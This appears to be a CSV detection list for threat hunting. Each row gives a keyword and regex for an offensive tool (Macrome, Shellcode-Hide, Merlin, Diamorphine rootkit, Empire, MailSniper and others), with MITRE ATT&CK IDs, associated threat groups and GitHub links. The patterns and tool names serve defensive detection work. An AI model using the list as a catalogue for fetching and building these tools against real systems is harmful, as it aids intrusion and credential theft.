"*MacroExploit.txt*",".{0,1000}MacroExploit\.txt.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","51533"
"*Macrome *--decoy-document*",".{0,1000}Macrome\s.{0,1000}\-\-decoy\-document.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51534"
"*Macrome *--payload*",".{0,1000}Macrome\s.{0,1000}\-\-payload.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51535"
"*Macrome build*",".{0,1000}Macrome\sbuild.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51536"
"*Macrome.csproj*",".{0,1000}Macrome\.csproj.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51537"
"*Macrome.dll*",".{0,1000}Macrome\.dll.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51538"
"*Macrome.sln*",".{0,1000}Macrome\.sln.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","51539"
"*MACshellcode.cpp*",".{0,1000}MACshellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","51540"
"*MACshellcode.exe*",".{0,1000}MACshellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","51541"
"*MACshellcode.sln*",".{0,1000}MACshellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","51542"
"*MACshellcode.vcxproj*",".{0,1000}MACshellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","51543"
"*Made by: @Trevohack | @opabravo | @matheuz*",".{0,1000}Made\sby\:\s\@Trevohack\s\|\s\@opabravo\s\|\s\@matheuz.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","51544"
"*Made in France*by @Nicocha30!*",".{0,1000}Made\sin\sFrance.{0,1000}by\s\@Nicocha30!.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","51545"
"*MadExploits/Gecko*",".{0,1000}MadExploits\/Gecko.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","51546"
"*maestro.exe exec*",".{0,1000}maestro\.exe\sexec.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","51547"
"*MAGENT=merlinAgent*",".{0,1000}MAGENT\=merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51548"
"*MAGIC_PREFIX ""diamorphine_secret*",".{0,1000}MAGIC_PREFIX\s\""diamorphine_secret.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","51549"
"*magicRasMan*",".{0,1000}magicRasMan.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","51550"
"*Magnitude Exploit Kit*",".{0,1000}Magnitude\sExploit\sKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","51551"
"*mail-in-the-middle.py*",".{0,1000}mail\-in\-the\-middle\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","1","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","51552"
"*mailpv.exe*",".{0,1000}mailpv\.exe.{0,1000}","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details  in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51553"
"*mailpv.zip*",".{0,1000}mailpv\.zip.{0,1000}","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details  in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51554"
"*MailSniper*",".{0,1000}MailSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Discovery","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","51555"
"*MailSniper.ps1*",".{0,1000}MailSniper\.ps1.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","51556"
"*main/gcr.py*",".{0,1000}main\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","51557"
"*main_air_service-probes.go*",".{0,1000}main_air_service\-probes\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","51558"
"*main_pro_service-probes.go*",".{0,1000}main_pro_service\-probes\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","51559"
"*make image && make proxydll*",".{0,1000}make\simage\s\&\&\smake\sproxydll.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","51561"
"*make image && make proxydll*",".{0,1000}make\simage\s\&\&\smake\sproxydll.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","51562"
"*make onionpipe*",".{0,1000}make\sonionpipe.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","51563"
"*make proxychains quiet*",".{0,1000}make\sproxychains\squiet.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","51564"
"*make shared dir for kidlogger ini files*",".{0,1000}make\sshared\sdir\sfor\skidlogger\sini\sfiles.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51565"
"*make tun2socks*",".{0,1000}make\stun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","51566"
"*make_avet -l *.exe *",".{0,1000}make_avet\s\-l\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51567"
"*make_avetsvc *",".{0,1000}make_avetsvc\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51568"
"*make_kernel_shellcode*",".{0,1000}make_kernel_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51569"
"*make_kernel_user_payload*",".{0,1000}make_kernel_user_payload.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51570"
"*make_smb1_anonymous_login_packet*",".{0,1000}make_smb1_anonymous_login_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51571"
"*make_smb1_echo_packet*",".{0,1000}make_smb1_echo_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51572"
